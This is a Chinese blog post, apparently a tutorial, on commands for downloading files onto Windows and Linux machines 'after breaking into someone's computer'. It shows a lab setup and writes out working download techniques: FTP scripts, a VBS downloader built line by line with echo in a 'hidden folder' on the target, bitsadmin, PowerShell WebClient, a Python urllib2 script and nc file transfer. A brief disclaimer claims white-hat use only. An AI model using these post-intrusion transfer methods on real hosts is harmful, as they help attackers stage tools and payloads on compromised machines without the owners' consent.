入侵别人电脑后你必须要会的Linux与window系统用命令行下载网络资源的15种方式
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理
-
window系统常见下载方式
-
FTP脚本
vbs脚本
bitsadmin命令
$client命令
Linux系统常见下载方式
-
wget
curl
lynx
fetch
Axel
aria2
youtube-dl
双方均可用
-
links
links2
python脚本
nc
没有跳转的均没有演示,可参考文章或自行百度
实验环境:
- Windows Server 2008 R2 x64
- IIS服务器
- kali
环境搭建:
安装IIS服务器
在C:\inetpub\wwwroot
网站目录下放一个www.rar文件并且浏览器能够访问到
模拟实验:
Windows命令下载方式
1、FTP脚本实现下载
用echo生成txt文件,ip用户名密码均为目标机的,如下:
输入ftp -s:ftp.txt
执行该文件,成功下载1.rar
2、vbs脚本实现下载
在桌面创建一个文件夹将vbs脚本放进去,注意修改路径。代码如下:Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.70.128/www.rar",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2
然後双击执行,压缩文件就被下载了
但人家电脑里不会有这种文件需要你自己生成,方法如下:
进入到一个隐蔽的文件夹,然后用echo语句按顺序输入代码生成vbs脚本,如:
echo Set xPost=createObject("Microsoft.XMLHTTP")>>b.vbs
echo xPost.Open "GET","http://192.168.70.128/www.rar",0 >>b.vbs
echo xPost.Send()>>b.vbs
echo set sGet=createObject("ADODB.Stream")>>b.vbs
echo sGet.Mode=3>>b.vbs
echo sGet.Type=1>>b.vbs
echo sGet.Open()>>b.vbs
echo sGet.Open()>>b.vbs
echo sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2 >>b.vbs
脚本生成后输入cscript a.vbs
执行就可以下载了
3、bitsadmin命令下载
环境同上,直接输入bitsadmin /transfer n http://192.168.70.128/www.rar C:\Users\sq\Desktop\a\www.rar
即可实现下载
成功下载
4、$client命令下载
环境同上,在搜索框中输入p然后以管理员身份运行poershell
在命令行中依次打入
$client = new-object System.Net.WebClient
$client.DownloadFile('http://192.168.70.128/www.rar','C:\Users\sq\Desktop\www.rar')
前面是网站路径,后面是保存路径,文件名可换
Linux命令下载方式
1、wget命令下载
这个使用起来很简单,直接输入wget+网址就可以了,加-p参数还可以指定文件夹,如果文件夹不存在会自动创建
2、curl命令下载
这个命令需要在网址后加–output参数,后面跟文件名即可
3、python脚本实现下载
创建一个xiazai.py文件修改地址然后执行即可,python代码如下:
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.70.128/www.rar')
localFile = open('1.rar', 'w')
localFile.write(u.read())
localFile.close()
4、nc命令下载
这个方法需要两台机器都有nc,然后目标服务器开放端口,自己在进行接收就可以了,方法如下:
我们开启两个终端,当做是两台服务器,目标端输入cat 1.rar | nc -lvvp 1234
开始监听,本地输入nc 127.0.0.1 1234 > 1.rar
接收
注意:这里因为是一台机器演示所以用127.0.0.1,真实情况换成网站地址或ip即可,还有执行完后它不会自动退出,你感觉下载完了就Ctrl+C终止
下完后我们可以ls -l
看一下文件字节数是否相同
欢迎关注公众号,原创不易,转载请注明来源哦😘
相关文章
- Linux Pwn栈溢出入门挣扎自闭
- linux 之 压缩 / 解压
- Linux中怎么通过PID号找到对应的进程名及所在目录
- ffmpeg:m4a转mp3(ffmpeg 4.2.2 / linux / centos8)
- 【Linux基础】linux updatedb命令
- Linux基础之linux常用命令之文本替换
- Linux 文件系统基本介绍
- 浅析 Linux 文件 IO 读写
- 【Linux 内核】调度器 ② ( sched_class 调度类结构体源码 | 源码路径 linux-5.6.18kernelschedsched.h )
- L81.linux命令每日一练 -- 第11章 Linux系统管理命令 -- ethtool和mii-tool
- L75.linux命令每日一练 -- 第11章 Linux系统管理命令 -- lsof和uptime
- L40.linux命令每日一练 -- 第七章 Linux用户管理及用户信息查询命令 -- useradd和usermod
- Linux内核中ideapad-laptop.c文件全解析8
- 嵌入式linux开发,Linux下访问PHY芯片寄存器
- 【Linux】linux经常使用基本命令
- 解决办法:Linux mysql命令 -bash: mysql: command not found 找不到命令
- linux定时任务的设置